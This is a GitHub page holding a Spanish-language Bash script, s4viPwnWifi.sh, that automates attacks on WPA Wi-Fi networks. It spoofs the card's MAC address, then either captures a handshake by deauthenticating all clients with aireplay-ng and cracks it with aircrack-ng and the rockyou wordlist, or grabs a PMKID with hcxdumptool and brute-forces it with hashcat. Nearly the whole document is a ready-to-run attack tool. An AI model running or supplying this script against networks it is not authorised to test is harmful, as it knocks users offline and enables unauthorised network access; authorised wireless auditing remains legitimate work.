-
Notifications
You must be signed in to change notification settings - Fork 80
/
s4viPwnWifi.sh
executable file
·133 lines (107 loc) · 4.68 KB
/
s4viPwnWifi.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/bin/bash
# Author: s4vitar - nmap y pa' dentro
#Colours
greenColour="\e[0;32m\033[1m"
endColour="\033[0m\e[0m"
redColour="\e[0;31m\033[1m"
blueColour="\e[0;34m\033[1m"
yellowColour="\e[0;33m\033[1m"
purpleColour="\e[0;35m\033[1m"
turquoiseColour="\e[0;36m\033[1m"
grayColour="\e[0;37m\033[1m"
export DEBIAN_FRONTEND=noninteractive
trap ctrl_c INT
function ctrl_c(){
echo -e "\n${yellowColour}[*]${endColour}${grayColour}Saliendo${endColour}"
tput cnorm; airmon-ng stop ${networkCard}mon > /dev/null 2>&1
rm Captura* 2>/dev/null
exit 0
}
function helpPanel(){
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Uso: ./s4viPwnWifi.sh${endColour}"
echo -e "\n\t${purpleColour}a)${endColour}${yellowColour} Modo de ataque${endColour}"
echo -e "\t\t${redColour}Handshake${endColour}"
echo -e "\t\t${redColour}PKMID${endColour}"
echo -e "\t${purpleColour}n)${endColour}${yellowColour} Nombre de la tarjeta de red${endColour}"
echo -e "\t${purpleColour}h)${endColour}${yellowColour} Mostrar este panel de ayuda${endColour}\n"
exit 0
}
function dependencies(){
tput civis
clear; dependencies=(aircrack-ng macchanger)
echo -e "${yellowColour}[*]${endColour}${grayColour} Comprobando programas necesarios...${endColour}"
sleep 2
for program in "${dependencies[@]}"; do
echo -ne "\n${yellowColour}[*]${endColour}${blueColour} Herramienta${endColour}${purpleColour} $program${endColour}${blueColour}...${endColour}"
test -f /usr/bin/$program
if [ "$(echo $?)" == "0" ]; then
echo -e " ${greenColour}(V)${endColour}"
else
echo -e " ${redColour}(X)${endColour}\n"
echo -e "${yellowColour}[*]${endColour}${grayColour} Instalando herramienta ${endColour}${blueColour}$program${endColour}${yellowColour}...${endColour}"
apt-get install $program -y > /dev/null 2>&1
fi; sleep 1
done
}
function startAttack(){
clear
echo -e "${yellowColour}[*]${endColour}${grayColour} Configurando tarjeta de red...${endColour}\n"
airmon-ng start $networkCard > /dev/null 2>&1
ifconfig ${networkCard}mon down && macchanger -a ${networkCard}mon > /dev/null 2>&1
ifconfig ${networkCard}mon up; killall dhclient wpa_supplicant 2>/dev/null
echo -e "${yellowColour}[*]${endColour}${grayColour} Nueva dirección MAC asignada ${endColour}${purpleColour}[${endColour}${blueColour}$(macchanger -s ${networkCard}mon | grep -i current | xargs | cut -d ' ' -f '3-100')${endColour}${purpleColour}]${endColour}"
if [ "$(echo $attack_mode)" == "Handshake" ]; then
xterm -hold -e "airodump-ng ${networkCard}mon" &
airodump_xterm_PID=$!
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Nombre del punto de acceso: ${endColour}" && read apName
echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Canal del punto de acceso: ${endColour}" && read apChannel
kill -9 $airodump_xterm_PID
wait $airodump_xterm_PID 2>/dev/null
xterm -hold -e "airodump-ng -c $apChannel -w Captura --essid $apName ${networkCard}mon" &
airodump_filter_xterm_PID=$!
sleep 5; xterm -hold -e "aireplay-ng -0 10 -e $apName -c FF:FF:FF:FF:FF:FF ${networkCard}mon" &
aireplay_xterm_PID=$!
sleep 10; kill -9 $aireplay_xterm_PID; wait $aireplay_xterm_PID 2>/dev/null
sleep 10; kill -9 $airodump_filter_xterm_PID
wait $airodump_filter_xterm_PID 2>/dev/null
xterm -hold -e "aircrack-ng -w /usr/share/wordlists/rockyou.txt Captura-01.cap" &
elif [ "$(echo $attack_mode)" == "PKMID" ]; then
clear; echo -e "${yellowColour}[*]${endColour}${grayColour} Iniciando ClientLess PKMID Attack...${endColour}\n"
sleep 2
timeout 60 bash -c "hcxdumptool -i ${networkCard}mon --enable_status=1 -o Captura"
echo -e "\n\n${yellowColour}[*]${endColour}${grayColour} Obteniendo Hashes...${endColour}\n"
sleep 2
hcxpcaptool -z myHashes Captura; rm Captura 2>/dev/null
test -f myHashes
if [ "$(echo $?)" == "0" ]; then
echo -e "\n${yellowColour}[*]${endColour}${grayColour} Iniciando proceso de fuerza bruta...${endColour}\n"
sleep 2
hashcat -m 16800 /usr/share/wordlists/rockyou.txt myHashes -d 1 --force
else
echo -e "\n${redColour}[!]${endColour}${grayColour} No se ha podido capturar el paquete necesario...${endColour}\n"
rm Captura* 2>/dev/null
sleep 2
fi
else
echo -e "\n${redColour}[*] Este modo de ataque no es válido${endColour}\n"
fi
}
# Main Function
if [ "$(id -u)" == "0" ]; then
declare -i parameter_counter=0; while getopts ":a:n:h:" arg; do
case $arg in
a) attack_mode=$OPTARG; let parameter_counter+=1 ;;
n) networkCard=$OPTARG; let parameter_counter+=1 ;;
h) helpPanel;;
esac
done
if [ $parameter_counter -ne 2 ]; then
helpPanel
else
dependencies
startAttack
tput cnorm; airmon-ng stop ${networkCard}mon > /dev/null 2>&1
fi
else
echo -e "\n${redColour}[*] No soy root${endColour}\n"
fi